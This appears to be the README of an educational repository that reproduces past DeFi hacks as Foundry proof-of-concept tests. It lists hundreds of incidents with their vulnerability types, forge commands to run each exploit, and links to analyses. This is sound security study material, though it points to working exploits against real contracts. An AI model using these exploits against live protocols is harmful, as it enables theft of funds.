DeFi Hacks Reproduce - Foundry Reproduce DeFi hack incidents using Foundry.
379 incidents included.
Let's make Web3 secure! Join Discord
Notion: 101 root cause analysis of past DeFi hacked incidents
Transaction debugging tools
Disclaimer: This content serves solely as a proof of concept showcasing past DeFi hacking incidents. It is strictly intended for educational purposes and should not be interpreted as encouraging or endorsing any form of illegal activities or actual hacking attempts. The provided information is for informational and learning purposes only, and any actions taken based on this content are solely the responsibility of the individual. The usage of this information should adhere to applicable laws, regulations, and ethical standards.
All articles are also published on Substack .
OnChain transaction debugging (Ongoing) List of Past DeFi Incidents 20240401 ATM
20240329 PrismaFi
20240325 ZongZi
20240314 ARK
20240321 SSS
20240320 Paraswap
20240314 MO
20240313 IT
20240309 Juice
20240309 UnizenIO
20240307 GHT
20240306 ALP
20240306 TGBS
20240305 Woofi
20240228 Seneca
20240228 SMOOFSStaking
20240223 CompoundUni
20240223 BlueberryProtocol
20240221 DeezNutz404
20240221 GAIN
20240219 RuggedArt
20240216 ParticleTrade
20240215 DualPools
20240215 Miner
20240211 Game
20240208 Pandora404
20240205 BurnsDefi
20240201 AffineDeFi
20240130 MIMSpell
20240128 BarleyFinance
20240127 CitadelFinance
20240125 NBLGAME
20240117 BmiZapper
20240117 SocketGateway
20240112 WiseLending
20240110 LQDX Alert
20240104 Gamma
20240102 RadiantCapital
20240101 OrbitChain
2023
20231225 Telcoin
20231222 PineProtocol
20231220 TransitFinance
20231217 FloorProtocol
20231216 NFTTrader
20231213 HYPR
20231206 TIME
20231206 ElephantStatus
20231205 BEARNDAO
20231201 UnverifiedContr_0x431abb
20231129 AIS
20231125 TheNFTV2
20231122 KyberSwap
20231117 Token8633_9419
20231117 ShibaToken
20231115 LinkDAO
20231114 OKC Project
20231112 MEV_0x8c2d
20231112 MEV_0xa247
20231111 Mahalend
20231110 Raft_fi
20231110 GrokToken
20231107 MEVbot
20231106 TrustPad
20231106 TheStandard_io
20231102 3913Token
20231101 OnyxProtocol
20231031 UniBotRouter
20231028 AstridProtocol
20231024 MaestroRouter2
20231022 OpenLeverage
20231019 kTAF
20231018 HopeLend
20231018 MicDao
20231013 BelugaDex
20231013 WiseLending
20231012 Platypus
20231011 BH
20231008 pSeudoEth
20231007 StarsArena
20231005 DePayRouter
20230930 FireBirdPair
20230929 DEXRouter
20230926 XSDWETHpool
20230924 KubSplit
20230921 CEXISWAP
20230916 uniclyNFT
20230911 0x0DEX
20230909 BFCToken
20230908 APIG
20230907 HCT
20230905 JumpFarm
20230905 HeavensGate
20230905 FloorDAO
20230902 DAppSocial
20230829 EAC
20230827 Balancer
20230826 SVT
20230824 GSS
20230821 EHIVE
20230819 BTC20
20230818 ExactlyProtocol
20230814 ZunamiProtocol
20230809 EarningFram
20230802 CurveBurner
20230802 Uwerx
20230801 NeutraFinance
20230801 LeetSwap
20230731 GYMNET
20230730 Curve
20230726 Carson
20230724 Palmswap
20230723 MintoFinance
20230722 ConicFinance02
20230721 ConicFinance
20230721 SUT
20230720 Utopia
20230720 FFIST
20230718 APEDAO
20230718 BNO
20230717 NewFi
20230712 Platypus
20230712 WGPT
20230711 RodeoFinance
20230711 Libertify
20230710 ArcadiaFi
20230708 CIVNFT
20230708 Civfund
20230707 LUSD
20230704 BambooIA
20230704 BaoCommunity
20230703 AzukiDAO
20230630 Biswap
20230628 Themis
20230623 SHIDO
20230621 BabyDogeCoin02
20230621 BUNN
20230620 MIM
20230618 ARA
20230617 Pawnfi
20230615 CFC
20230615 DEPUSDT_LEVUSDC
20230612 Sturdy Finance
20230611 SellToken04
20230607 CompounderFinance
20230606 VINU
20230606 UN
20230602 NST SimpleSwap
20230601 DDCoin
20230601 Cellframenet
20230531 ERC20TokenBank
20230529 Jimbo
20230529 BabyDogeCoin
20230529 FAPEN
20230529 NOON_NO
20230525 GPT
20230524 LocalTrade
20230524 CS
20230523 LFI
20230514 landNFT
20230514 SellToken03
20230513 Bitpaidio
20230513 SellToken02
20230512 LW
20230511 SellToken01
20230510 SNK
20230509 MCC
20230509 HODL
20230506 Melo
20230505 DEI
20230503 NeverFall
20230502 Level
20230428 0vix
20230427 SiloFinance
20230424 Axioma
20230419 OLIFE
20230416 Swapos V2
20230415 HundredFinance
20230413 yearnFinance
20230412 MetaPoint
20230411 Paribus
20230409 SushiSwap
20230405 Sentiment
20230402 Allbridge
20230328 SafeMoon Hack
20230328 THENA
20230325 DBW
20230322 BIGFI
20230317 ParaSpace NFT
20230315 Poolz
20230313 EulerFinance
20230308 DKP
20230307 Phoenix
20230227 LaunchZone
20230227 SwapX
20230224 EFVault
20230222 DYNA
20230218 RevertFinance
20230217 Starlink
20230217 Dexible
20230217 Platypusdefi
20230210 Sheep Token
20230210 dForce
20230207 CowSwap
20230206 FDP Token
20230203 Orion Protocol
20230203 Spherax USDs
20230202 BonqDAO
20230130 BEVO
20230126 TomInu Token
20230119 SHOCO Token
20230119 ThoreumFinance
20230118 QTN Token
20230118 UPS Token
20230117 OmniEstate
20230116 MidasCapital
20230111 UFDao
20230111 ROE
20230110 BRA
20230103 GDS
2022
20221230 DFS
20221229 JAY
20221225 Rubic
20221223 Defrost
20221214 Nmbplatform
20221214 FPR
20221213 ElasticSwap
20221212 BGLD
20221211 Lodestar
20221210 MUMUG
20221210 TIFIToken
20221209 NOVAToken
20221207 AES
20221205 RFB
20221205 BBOX
20221202 OverNight
20221201 APC
20221129 MBC & ZZSH
20221129 SEAMAN
20221123 NUM
20221122 AUR
20221121 SDAO
20221119 AnnexFinance
20221117 UEarnPool
20221116 SheepFarm
20221110 DFXFinance
20221109 brahTOPG
20221108 MEV_0ad8
20221108 Kashi
20221107 MooCAKECTX
20221105 BDEX
20221027 VTF
20221027 Team Finance
20221026 N00d Token
20221025 ULME
20221024 Market
20221024 MulticallWithoutCheck
20221021 OlympusDAO
20221020 HEALTH Token
20221020 BEGO Token
20221018 HPAY
20221018 PLTD Token
20221017 Uerii Token
20221014 INUKO Token
20221014 EFLeverVault
20221014 MEVBOT a47b
20221012 ATK
20221011 Rabby Wallet SwapRouter
20221011 Templedao
20221010 Carrot
20221009 Xave Finance
20221006 RES-Token
20221002 Transit Swap
20221001 BabySwap
20221001 RL
20221001 Thunder Brawl
20220929 BXH
20220928 MEVBOT Badc0de
20220923 RADT-DAO
20220913 MevBot Private TX
20220909 DPC
20220908 YYDS
20220908 NewFreeDAO
20220908 Ragnarok Online Invasion
20220906 NXUSD
20220905 ZoomproFinance
20220902 ShadowFi
20220902 Bad Guys by RPF
20220824 LuckyTiger NFT
20220810 XSTABLE Protocol
20220809 ANCH
20220807 EGD Finance
20220802 Nomad Bridge
20220801 Reaper Farm
20220725 LPC
20220723 Audius
20220713 SpaceGodzilla
20220710 Omni NFT
20220706 FlippazOne NFT
20220701 Quixotic - Optimism NFT Marketplace
20220626 XCarnival
20220624 Harmony's Horizon Bridge
20220618 SNOOD
20220616 InverseFinance
20220608 GYMNetwork
20220608 Optimism - Wintermute
20220606 Discover
20220529 NOVO Protocol
20220524 HackDao
20220517 ApeCoin
20220508 Fortress Loans
20220430 Saddle Finance
20220430 Rari Capital/Fei Protocol
20220428 DEUS DAO
20220424 Wiener DOGE
20220423 Akutar NFT
20220421 Zeed Finance
20220416 BeanstalkFarms
20220415 Rikkei Finance
20220412 ElephantMoney
20220411 Creat Future
20220409 GYMNetwork
20220329 Ronin Network
20220329 Redacted Cartel
20220327 Revest Finance
20220326 Auctus
20220322 CompoundTUSDSweepTokenBypass
20220321 OneRing Finance
20220320 LI.FI
20220320 Umbrella Network
20220315 Hundred Finance
20220313 Paraluni
20220309 Fantasm Finance
20220305 Bacon Protocol
20220303 TreasureDAO
20220214 BuildFinance - DAO
20220208 Sandbox LAND
20220206 Meter
20220206 TecraSpace
20220128 Qubit Finance
20220118 Multichain (Anyswap)
2021
20211221 Visor Finance
20211218 Grim Finance
20211214 Nerve Bridge
20211130 MonoX Finance
20211027 Cream Finance
20211015 Indexed Finance
20210916 SushiSwap Miso
20210915 Nimbus Platform
20210915 NowSwap Platform
20210912 ZABU Finance
20210903 DAO Maker
20210830 Cream Finance
20210817 XSURGE
20210811 Poly Network
20210804 WaultFinance
20210728 Levyathan Finance
20210710 Chainswap
20210702 Chainswap
20210628 SafeDollar
20210625 xWin Finance
20210622 Eleven Finance
20210607 88mph NFT
20210603 PancakeHunny
20210527 BurgerSwap
20210519 PancakeBunny
20210508 Rari Capital
20210508 Value Defi
20210502 Spartan
20210428 Uranium
20210308 DODO
20210305 Paid Network
20210125 Sushi Badger Digg
Before 2020
20201229 Cover Protocol
20201121 Pickle Finance
20201026 Harvest Finance
20200804 Opyn Protocol
20200618 Bancor Protocol
20200418 UniSwapV1
20180422 Beauty Chain
20171106 Parity - 'Accidentally Killed It'
Transaction debugging tools Phalcon | Tx tracer | Cruise | Ethtx | Tenderly | eigenphi
Ethereum Signature Database 4byte | sig db | etherface
ABI to interface | Get ABI for unverified contracts | ETH Calldata Decoder | ETHCMD - Guess ABI | Abi tools
Slowmist | Defillama | De.Fi | Rekt | Cryptosec
List of DeFi Hacks & POCs 20240401 ATM - business logic flaw forge test --contracts ./src/test/ATM_exp.sol -vvv
ATM_exp.sol
20240329 PrismaFi - Insufficient Validation forge test --contracts ./src/test/Prisma_exp.sol -vvv Prisma_exp.sol
https://twitter.com/EXVULSEC/status/1773371049951797485
20240325 ZongZi - Price Manipulation forge test --contracts src/test/ZongZi_exp.sol -vvv
ZongZi_exp.sol
https://twitter.com/0xNickLFranklin/status/1772195949638775262
20240321 SSS - Token Balance Doubles on Transfer to self forge test --contracts ./src/test/SSS_exp.sol -vvv SSS_exp.sol
https://twitter.com/dot_pengun/status/1770989208125272481
20240324 ARK - business logic flaw forge test --contracts src/test/ARK_exp.sol -vvv
ARK_exp.sol
https://twitter.com/Phalcon_xyz/status/1771728823534375249
20240320 Paraswap - Incorrect Access Control forge test --contracts src/test/Paraswap_exp.sol -vvv --evm-version shanghai
Paraswap_exp.sol
https://medium.com/neptune-mutual/analysis-of-the-paraswap-exploit-1f97c604b4fe
20240314 MO - business logic flaw forge test --contracts src/test/MO_exp.sol -vvv
MO_exp.sol
https://twitter.com/0xNickLFranklin/status/1768184024483430523
20240313 IT - business logic flaw forge test --via-ir --contracts src/test/IT_exp.sol -vvv
IT_exp.sol
https://twitter.com/0xNickLFranklin/status/1768171595561046489
20240309 Juice - Business Logic Flaw forge test --contracts ./src/test/Juice_exp.sol -vvv Juice_exp.sol
https://medium.com/@juicebotapp/juice-staking-exploit-next-steps-95e218b3ec71
20240309 UnizenIO - unverified external call forge test --contracts src/test/UnizenIO_exp.sol -vvvv
UnizenIO_exp.sol | UnizenIO2_exp.sol
https://twitter.com/Phalcon_xyz/status/1766274000534004187
https://twitter.com/AnciliaInc/status/1766261463025684707
20240307 GHT - Business Logic Flaw forge test --contracts ./src/test/GHT_exp.sol -vvv
GHT_exp.sol
20240306 ALP - Public internal function Testing
forge test --contracts ./src/test/ALP_exp.sol -vvv
ALP_exp.sol
https://twitter.com/0xNickLFranklin/status/1765296663667875880
20240306 TGBS - Business Logic Flaw forge test --contracts ./src/test/TGBS_exp.sol -vvv
TGBS_exp.sol
https://twitter.com/0xNickLFranklin/status/1765290290083144095
https://twitter.com/Phalcon_xyz/status/1765285257949974747
20240305 Woofi - Price Manipulation forge test --contracts ./src/test/Woofi_exp.sol -vvv
Woofi_exp.sol
https://twitter.com/spreekaway/status/1765046559832764886
https://twitter.com/PeckShieldAlert/status/1765054155478175943
20240228 Seneca - Arbitrary External Call Vulnerability forge test --contracts ./src/test/Seneca_exp.sol -vvv
Seneca_exp.sol
https://twitter.com/Phalcon_xyz/status/1763045563040411876
20240228 SMOOFSStaking - Reentrancy forge test --contracts ./src/test/SMOOFSStaking_exp.sol -vvv
SMOOFSStaking_exp.sol
https://twitter.com/AnciliaInc/status/1762893563103428783
https://twitter.com/0xNickLFranklin/status/1762895774311178251
20240223 CompoundUni - Oracle bad price forge test --contracts ./src/test/CompoundUni_exp.sol -vvv
CompoundUni_exp.sol
https://twitter.com/0xLEVI104/status/1762092203894276481
20240223 BlueberryProtocol - logic flaw forge test --contracts ./src/test/BlueberryProtocol_exp.sol -vvv
BlueberryProtocol_exp.sol
https://twitter.com/blueberryFDN/status/1760865357236211964
20240221 DeezNutz 404 - lack of validation forge test --contracts ./src/test/DeezNutz404_exp.sol -vvv
DeezNutz404_exp.sol
https://twitter.com/0xNickLFranklin/status/1760481343161700523
20240221 GAIN - bad function implementation forge test --contracts ./src/test/GAIN_exp.sol -vvv
GAIN_exp.sol
https://twitter.com/0xNickLFranklin/status/1760559768241160679
20240219 RuggedArt - reentrancy forge test --contracts ./src/test/RuggedArte_exp.sol -vvv
RuggedArte_exp.sol
https://twitter.com/EXVULSEC/status/1759822545875025953
20240216 ParticleTrade - lack of validation data forge test --contracts ./src/test/ParticleTrade_exp.sol -vvv
ParticleTrade_exp.sol
https://twitter.com/Phalcon_xyz/status/1758028270770250134
20240215 DualPools - precision truncation forge test --contracts ./src/test/DualPools_exp.sol -vvvv
DualPools_exp.sol
https://medium.com/@lunaray/dualpools-hack-analysis-5209233801fa
20240215 Miner - lack of validation dst address forge test --contracts ./src/test/Miner_exp.sol -vvv --evm-version shanghai
Miner_exp.sol
https://twitter.com/Phalcon_xyz/status/1757777340002681326
20240211 Game - Reentrancy && Business Logic Flaw forge test --contracts ./src/test/Game_exp.sol -vvv
Game_exp.sol
https://twitter.com/AnciliaInc/status/1757533144033739116
20240208 Pandora - interger underflow forge test --contracts ./src/test/PANDORA_exp.sol -vvv
PANDORA_exp.sol
https://twitter.com/pennysplayer/status/1766479470058406174
20240205 BurnsDefi - Price Manipulation forge test --contracts ./src/test/BurnsDefi_exp.sol -vvv
BurnsDefi_exp.sol
https://twitter.com/pennysplayer/status/1754342573815238946
https://medium.com/neptune-mutual/how-was-citadel-finance-exploited-a5f9acd0b408 (similar incident)
20240201 AffineDeFi - lack of validation userData forge test --contracts ./src/test/AffineDeFi_exp.sol -vvv
AffineDeFi_exp.sol
https://twitter.com/Phalcon_xyz/status/1753020812284809440
https://twitter.com/CyversAlerts/status/1753040754287513655
20240130 MIMSpell - Precission Loss forge test --contracts ./src/test/MIMSpell2_exp.sol -vvv
MIMSpell2_exp.sol
https://twitter.com/kankodu/status/1752581744803680680
https://twitter.com/Phalcon_xyz/status/1752278614551216494
https://twitter.com/peckshield/status/1752279373779194011
https://phalcon.blocksec.com/explorer/security-incidents
20240128 BarleyFinance - Reentrancy forge test --contracts ./src/test/BarleyFinance_exp.sol -vvv
BarleyFinance_exp.sol
https://phalcon.blocksec.com/explorer/security-incidents
https://www.bitget.com/news/detail/12560603890246
https://twitter.com/Phalcon_xyz/status/1751788389139992824
20240127 CitadelFinance - Price Manipulation forge test --contracts ./src/test/CitadelFinance_exp.sol -vvv
CitadelFinance_exp.sol
https://medium.com/neptune-mutual/how-was-citadel-finance-exploited-a5f9acd0b408
20240125 NBLGAME - Reentrancy forge test --contracts ./src/test/NBLGAME_exp.sol -vvv
NBLGAME_exp.sol
https://twitter.com/SlowMist_Team/status/1750526097106915453
https://twitter.com/AnciliaInc/status/1750558426382635036
20240117 BmiZapper - Arbitrary external call vulnerability forge test --contracts ./src/test/Bmizapper_exp.sol -vvv
BmiZapper_exp.sol
https://x.com/0xmstore/status/1747756898172952725
20240112 SocketGateway - Lack of calldata validation forge test --contracts ./src/test/SocketGateway_exp.sol -vvv --evm-version shanghai
SocketGateway_exp.sol
https://twitter.com/BeosinAlert/status/1747450173675196674
https://twitter.com/peckshield/status/1747353782004900274
20240112 WiseLending - Loss of Precision forge test --contracts ./src/test/WiseLending02_exp.sol -vvv --evm-version shanghai
WiseLending02_exp.sol
https://twitter.com/EXVULSEC/status/1746829519334650018
https://twitter.com/peckshield/status/1745907642118123774
20240110 LQDX - Unauthorized TransferFrom forge test --contracts src/test/LQDX_alert_exp.sol -vvv
LQDX_alert_exp.sol
https://twitter.com/SlowMist_Team/status/1744972012865671452
20240104 Gamma - Price manipulation forge test --contracts ./src/test/Gamma_exp.sol -vvv
Gamma_exp.sol
https://twitter.com/officer_cia/status/1742772207997050899
https://twitter.com/shoucccc/status/1742765618984829326
20240102 RadiantCapital - Loss of Precision forge test --contracts ./src/test/RadiantCapital_exp.sol -vvv
RadiantCapital_exp.sol
https://neptunemutual.com/blog/how-was-radiant-capital-exploited/
https://twitter.com/BeosinAlert/status/1742389285926678784
20240101 OrbitChain - Incorrect input validation forge test --contracts ./src/test/OrbitChain_exp.sol -vvv
OrbitChain_exp.sol
https://blog.solidityscan.com/orbit-chain-hack-analysis-b71c36a54a69
Foundry also has the ability to report the gas used per function call which mimics the behavior of hardhat-gas-reporter . Generally speaking if gas costs per function call is very high, then the likelihood of its success is reduced. Gas optimization is an important activity done by smart contract developers.
Every poc in this repository can produce a gas report like this:
forge test --gas-report --contracts < contract> -vvv For Example:
Let us find out the gas used in the Audius poc
Execution
forge test --gas-report --contracts ./src/test/Audius.exp.sol -vvv Demo
Moved to DeFiVulnLabs
Moved to DeFiLabs
